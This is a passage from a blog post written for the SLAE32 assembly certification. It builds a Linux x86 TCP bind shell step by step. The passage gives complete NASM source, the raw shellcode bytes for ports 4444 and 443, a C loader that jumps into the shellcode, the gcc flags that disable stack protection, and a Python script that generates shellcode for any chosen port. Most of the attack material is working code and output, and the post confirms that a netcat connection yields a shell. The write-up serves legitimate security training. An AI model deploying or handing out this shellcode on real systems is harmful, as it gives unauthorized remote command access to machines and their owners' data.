again query the unistd_32.h file:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ncat  \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h | grep execve \n#define __NR_execve 11\n#define __NR_execveat 358\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419222603.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We determine the syscall number of <strong>execve()<\/strong> is <strong>11<\/strong>, which in hex is <strong>0xb<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">execve() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>execve()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">pathname<\/h4>\n\n\n\n<p>The pathname argument is a pointer to the null-terminated file path of the program executed by <strong>execve()<\/strong>.<\/p>\n\n\n\n<p>This value is pushed to the stack in little-endian format. We will point this argument at the file path \/bin\/sh.<\/p>\n\n\n\n<p>To maintain stack alignment, we will push the string '\/\/bin\/sh', which has a length of 8. 
In doing so, we can cleanly push this value to the stack in two instructions.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">argv<\/h4>\n\n\n\n<p>The argv argument is an array of pointers to strings to be passed to the new program as command-line arguments.<\/p>\n\n\n\n<p>In this case, as we are just looking to implement a call to \/bin\/sh, we will leave this as NULL.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">envp<\/h4>\n\n\n\n<p>The envp argument is an array of pointers to strings to be passed as the environment of the new program.<\/p>\n\n\n\n<p>Once again, as we are just looking to implement a call to \/bin\/sh, we can leave this as NULL.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">execve() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>execve()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>execve<\/td><td>call<\/td><td>Syscall number<\/td><td>-<\/td><\/tr><tr><td>execve<\/td><td>pathname<\/td><td>Filepath of the program to execute<\/td><td>\"\/bin\/sh\"<\/td><\/tr><tr><td>execve<\/td><td>argv<\/td><td>Command-line arguments of the program<\/td><td>NULL<\/td><\/tr><tr><td>execve<\/td><td>envp<\/td><td>Environment of the new program<\/td><td>NULL<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling execve()<\/h3>\n\n\n\n<p>In case of our system call to <strong>execve()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (11)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - pathname (\"\/\/bin\/sh\" in 
reverse)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - argv (set to NULL)<\/li>\n\n\n\n<li><strong>EDX<\/strong> - envp (set to NULL)<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Reversing the pathname<\/h3>\n\n\n\n<p>In order to abide by the little-endian format, we must push values in reverse order to the stack.<\/p>\n\n\n\n<p>We can reverse the <strong>pathname<\/strong> and put it in little endian format using the below python code snippet.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/python\n\nimport sys\n\ninput = sys.argv&#x5B;1]\n\nprint 'String length : ' +str(len(input))\n\nstringList = &#x5B;input&#x5B;i:i+4] for i in range(0, len(input), 4)]\n\nfor item in stringList&#x5B;::-1] :\n    print item&#x5B;::-1] + ' : ' + str(item&#x5B;::-1].encode('hex'))\n\n<\/pre><\/div>\n\n\n<p>We can use this script to reverse the string \"\/\/bin\/sh\" and encode it in hex, so that we may include it in our assembly.<\/p>\n\n\n\n<p><strong>Note:<\/strong> as mentioned previously, we have prepended the <strong>pathname<\/strong> with an additional forward slash \"\/\" to make the string length as 8. 
This allows us to push the string evenly and maintain stack alignment.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\npython2 reverse.py &quot;\/\/bin\/sh&quot;\nString length : 8\nhs\/n : 68732f6e\nib\/\/ : 69622f2f\n<\/pre><\/div>\n\n\n<p>The output of the program gives us the two values we need to push to the stack, <strong>0x68732f6e<\/strong> and <strong>0x69622f2f<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419224332.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">execve() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>execve()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_execve:\n\n        ; Clear EAX register and set al to syscall number 11 in hex.\n        mov al, 0xb\n\n        ; Push pathname string to the stack and set the EBX register to it\n        xor ebx, ebx\n        push ebx;                       NULL terminate the string\n        push 0x68732f6e;                hs\/n - 0x68732f6e\n        push 0x69622f2f;                ib\/\/ - 0x69622f2f\n        mov ebx, esp;\n\n        ; Clear the ECX and EDX registers for argv and envp\n        xor ecx, ecx\n        xor edx, edx\n\n        ; Execute execve() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">execve() analysis<\/h3>\n\n\n\n<p>We can now step through our implementation of <strong>execve()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420231919.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>Note:<\/strong> We once again have to initiate a client connection in order to resume execution after the call to <strong>accept()<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232120.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The syscall is set up for the call to <strong>execve()<\/strong>, having moved <strong>0xb<\/strong> to the <strong>bl<\/strong> register:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232259.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The null-terminated string value of <strong>'\/\/bin\/sh'<\/strong> is pushed to the stack in preparation for the call to <strong>execve()<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232412.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ESP<\/strong> value is moved to the <strong>EBX<\/strong> register, so that <strong>EBX<\/strong> is pointing to the null-terminated string used for the <strong>pathname<\/strong> argument:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232541.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ECX<\/strong> and <strong>EDX<\/strong> registers are both cleared, as they are provided as the NULL <strong>argv<\/strong> and <strong>env<\/strong> arguments:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232727.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Finally, the syscall to <strong>execve()<\/strong> is made, and a call is made to the \/bin\/sh program:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232830.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We connect on the client side, and obtain a fully functioning bind shell.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232935.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Complete assembly code<\/h3>\n\n\n\n<p>The final assembly implementation of our TCP bind shell is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; bind_tcp_shell.nasm \n; Author: Jack McBride (PA-6483)\n; Blog: https:\/\/jacklgmcbride.co.uk\/blog\n; \n; Purpose: SLAE32 exam assignment\n;\n; Assignment 1: x86 TCP Bind Shell\n\nglobal _start\n\nsection .text\n\n_start:\n                        ; Linux x86 bind tcp shell\n                        ; set up socket\n                        ; set up bind\n                        ; set up listen\n                        ; set up accept\n\n_socket:\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        xor eax, eax\n        mov al, 0x66 \n\n        ; Clear EBX register and set bl to 0x1 for socket.\n        xor ebx, ebx\n        mov bl, 0x1\n\n        ; Clear ECX register and push values for protocol, type and domain to the stack\n        xor ecx, ecx\n        push ecx;       protocol - 0 (0x00000000)\n        push 0x1;       type - 1 (0x1)\n        
push 0x2;       domain - PF_INET (0x2)\n\n        ; set ECX to the top of the stack to point to args\n        mov ecx, esp\n\n        ; Execute socket() syscall\n        int 0x80\n\n_bind:\n\n        ; Clear and set EDX to socket file descriptor returned by socket()\n        xor edx, edx\n        mov edx, eax\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        xor eax, eax\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x2 for bind()\n        mov bl, 0x2\n\n        ; Push sockaddr arguments for call to bind()\n        xor ecx, ecx\n        push ecx;               sin_addr - INADDR_ANY (0x00000000)\n        push word 0x5c11;       sin_port - 4444 (0x5c11)\n        push word 0x2;          sin_family - AF_INET (2)\n\n        ; Save pointer to sockaddr to ESI register \n        mov esi, esp\n\n        push 0x10;              addrlen - 16 (0x10)\n        push esi;               addr\n        push edx;               sockfd\n\n        ; Set ECX to the top of the stack to point to args\n        mov ecx, esp;\n\n        ; Execute bind() syscall\n        int 0x80\n\n_listen:\n\n        ; Clear EAX regster and set al to syscall number 102 in hex.\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x4 for listen()\n        mov bl, 0x4\n\n        ; Push arguments to stack for call to listen()\n        push byte 0x2\n        push edx\n\n        ; set ECX to the top of the stack to point to args\n        mov ecx, esp\n\n        ; Execute listen() syscall\n        int 0x80\n\n_accept:\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x5 for accept()\n        mov bl, 0x5\n\n        ; Clear ECX and push arguments for call to accept()\n        xor ecx, ecx\n        push ecx;               addrlen - NULL\n        push ecx;               addr - NULL\n        push edx;               sockfd - stored in EDX\n\n        ; Set ECX to 
stack for call to accept()\n        mov ecx, esp\n\n        ; Execute accept() syscall\n        int 0x80\n\n_dup2:\n\n        ; Push the EAX register containing the socket file descriptor returned from accept()\n        push eax\n\n        ; Clear EAX register and set al to syscall number 63 in hex.\n        mov al, 0x3f\n        pop ebx;                  POP socket file descriptor into EBX for dup2 syscall\n        xor ecx, ecx;           Clear ECX register for initial redirection of STDIN (0)\n        int 0x80;                  Execute dup2() syscall\n\n        ; Set dup2() syscall for STDOUT\n        mov al, 0x3f\n        mov cl, 0x1\n        int 0x80\n\n        ; Set dup2() syscall for STDERR\n        mov al, 0x3f\n        mov cl, 0x2\n        int 0x80\n\n_execve:\n\n        ; Clear EAX register and set al to syscall number 11 in hex.\n        mov al, 0xb\n\n        ; Push pathname string to the stack and set the EBX register to it\n        xor ebx, ebx\n        push ebx;                           NULL terminate the string\n        push 0x68732f6e;               hs\/n - 0x68732f6e\n        push 0x69622f2f;                ib\/\/ - 0x69622f2f\n        mov ebx, esp;\n\n        ; Clear the ECX and EDX registers for argv and envp\n        xor ecx, ecx\n        xor edx, edx\n\n        ; Execute execve() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly and linkage<\/h3>\n\n\n\n<p>We can assemble and link our TCP bind shell program as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# nasm -f elf32 -o tcp_bind_shell.o tcp_bind_shell.nasm \n\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# ld -o 
tcp_bind_shell tcp_bind_shell.o\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420233348.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Executing the shellcode<\/h3>\n\n\n\n<p>Next, we can extract the raw shellcode from our tcp_bind_shell binary and insert it into our C shellcode loader.<\/p>\n\n\n\n<p>Our shellcode loader is a simple C program designed to print the length of our shellcode, and direct execution to it:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \n&quot;SHELLCODE&quot;;\n\nint main()\n{\n        \/\/ strlen() stops at the first NULL byte, so the printed length also confirms the shellcode is NULL-free\n        printf(&quot;Shellcode Length: %d\\n&quot;, strlen(code));\n\n        \/\/ Cast the buffer to a function pointer and jump into it (requires an executable stack\/data segment)\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n<\/pre><\/div>\n\n\n<p>To obtain the raw shellcode bytes of our TCP bind shell, we use an excellent <strong>objdump<\/strong> one liner from <a href=\"https:\/\/www.commandlinefu.com\/commands\/view\/6051\/get-all-shellcode-on-binary-file-from-objdump\">CommandlineFu<\/a>.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\nobjdump -d .\/tcp_bind_shell|grep '&#x5B;0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's\/ $\/\/g'|sed 's\/ \/\\\\x\/g'|paste -d '' -s |sed 's\/^\/&quot;\/'|sed 
's\/$\/&quot;\/g'\n&quot;\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\x31\\xc0\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80&quot;\n<\/pre><\/div>\n\n\n<p>We embed our shellcode into the <strong>code<\/strong> variable of our C program:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \n&quot;\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\x31\\xc0\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80&quot;;\n\nint main()\n{\n        printf(&quot;Shellcode Length: %dn&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n<\/pre><\/div>\n\n\n<p>Finally, we compile the our C program using gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# gcc 
-fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420233755.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Finally, we can test the shellcode, confirming that we are able to connect to the bind shell on TCP port 4444.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420233909.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Modifying the port<\/h3>\n\n\n\n<p>In most cases, the user wants to be able to choose which port they want the bind shell to be listening on.<\/p>\n\n\n\n<p>To compensate for this, below is a Python wrapper script which takes a 'port' argument and modifies the tcp_bind_shell.nasm file to assemble the shellcode with this new value. The script then outputs the shellcode to the console and performs cleanup of the created artifacts.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nimport argparse\nimport sys\nimport os\n\ndef convert_to_hex(port):\n\n        # Get hex value of port number\n        val = hex(port)&#x5B;2::]\n\n        # If the length is not divisible by two e.g. 
if a three-digit\n        # port such as 443 (0x1bb) is chosen, pad with an additional 0.\n        if not len(val) % 2 == 0:\n                val = &quot;0&quot; + val\n\n        # Convert port to little endian format\n        b = bytearray.fromhex(val)&#x5B;::-1]\n        port_le = ''.join(format(x, '02x') for x in b)\n\n        return &quot;0x&quot; + port_le\n\ndef set_port(port):\n        port = convert_to_hex(port)\n        asm = open(&quot;tcp_bind_shell_x86.nasm&quot;, 'rt')\n        data = asm.read()\n        data = data.replace('PORT', port)\n        asm.close()\n        asm = open('tmp.nasm', 'wt')\n        asm.write(data)\n        asm.close()\n\ndef gen_shellcode():\n        stream = os.popen(&quot;&quot;&quot;objdump -d tcp_bind_shell|grep '&#x5B;0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's\/ $\/\/g'|sed 's\/ \/\\\\\\\\x\/g'|paste -d '' -s |sed 's\/^\/&quot;\/'|sed 's\/$\/&quot;\/g'&quot;&quot;&quot;)\n        shellcode = stream.read().rstrip()\n        return shellcode\n\ndef print_shellcode(shellcode, port):\n        print(&quot;&#x5B;*] Generating shellcode for TCP bind shell on port %s&quot; % port)\n        print(&quot;&#x5B;*] Shellcode length: %d bytes&quot; % (len(shellcode.replace(&quot;\\\\x&quot;, &quot;&quot;)) \/2))\n        print(&quot;&#x5B;*] Checking for NULL bytes...\\n%s&quot; % (&quot;&#x5B;-] NULL bytes found.&quot; if &quot;00&quot; in shellcode else &quot;&#x5B;+] No NULL bytes detected!&quot;))\n        print(shellcode)\n\ndef main():\n\n        parser = argparse.ArgumentParser(description='Generate x86 TCP bind shell shellcode.')\n        parser.add_argument('-p', '--port', type=int, help='Local port for TCP bind shell to listen on.')\n\n        args = parser.parse_args()\n        if len(sys.argv) == 1:\n                parser.print_help()\n                sys.exit()\n\n        # Modify the port in tcp_bind_shell.nasm\n        set_port(args.port)\n\n        # Link and assemble code\n        
os.system('nasm -f elf32 -o tcp_bind_shell_x86.o tmp.nasm')\n        os.system('ld -o tcp_bind_shell_x86 tcp_bind_shell_x86.o')\n\n        # Dump the shellcode using objdump\n        shellcode = gen_shellcode()\n\n        # Print shellcode\n        print_shellcode(shellcode, args.port)\n\n        # Cleanup\n        os.system('rm tmp.nasm')\n        os.system('rm tcp_bind_shell_x86.o')\n        os.system('rm tcp_bind_shell_x86')\n\nif __name__ == &quot;__main__&quot;:\n        main()\n<\/pre><\/div>\n\n\n<p>We generate our shellcode for a bind shell on TCP port 443:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220421122435.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# python3 wrapper.py -p 443                                                                                                                                                                      130 \u2a2f 1 \u2699\n&#x5B;*] Generating shellcode for TCP bind shell on port 443\n&#x5B;*] Shellcode length: 117 bytes\n&#x5B;*] Checking for NULL bytes...\n&#x5B;+] No NULL bytes 
detected!\n&quot;\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\x31\\xc0\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x01\\xbb\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80&quot;\n<\/pre><\/div>\n\n\n<p>We can now paste the generated shellcode into our shellcode.c program:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220421122521.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \n&quot;\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\x31\\xc0\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x01\\xbb\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80&quot;;\n\nint main()\n{\n        printf(&quot;Shellcode Length: %dn&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n<\/pre><\/div>\n\n\n<p>We compile the shellcode with gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; 
gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<p>We connect over netcat and confirm that our TCP bind shell is listening on our specified port, 443. Success!<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220421122638-e1650551330573.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<p>The assembly, python and C source code for the above Linux x86 TCP bind shell implementation can be found on my <a href=\"https:\/\/github.com\/war4uthor\/SLAE32\">GitHub repository<\/a>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SecurityTube Linux Assembly Expert<\/a> certification.<\/p>\n\n\n\n<p><strong>Student ID:<\/strong> PA-6483<\/p>\n\n\n\n<p>All code was written and tested using 32-bit Kali Linux:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(jack\u327fkali)-&#x5B;~\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500$ uname -a\nLinux kali 5.5.0-kali2-686-pae #1 SMP Debian 5.5.17-1kali1 (2020-04-21) i686 GNU\/Linux\n<\/pre><\/div>\n\n\n<p>In the next blog post, we will be covering how to implement an x86 TCP reverse shell in assembly.<\/p>\n\n\n\n<p>Thanks for reading!<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n","protected":false},"excerpt":{"rendered":"<p>In this blog post, we will be covering the process behind writing and analysing an x86 TCP 
bind shell for Linux in assembly. This post will be the first in a series of posts created for the SLAE32 certification course provided by Pentester Academy. Overview The code for the TCP bind shell will consist 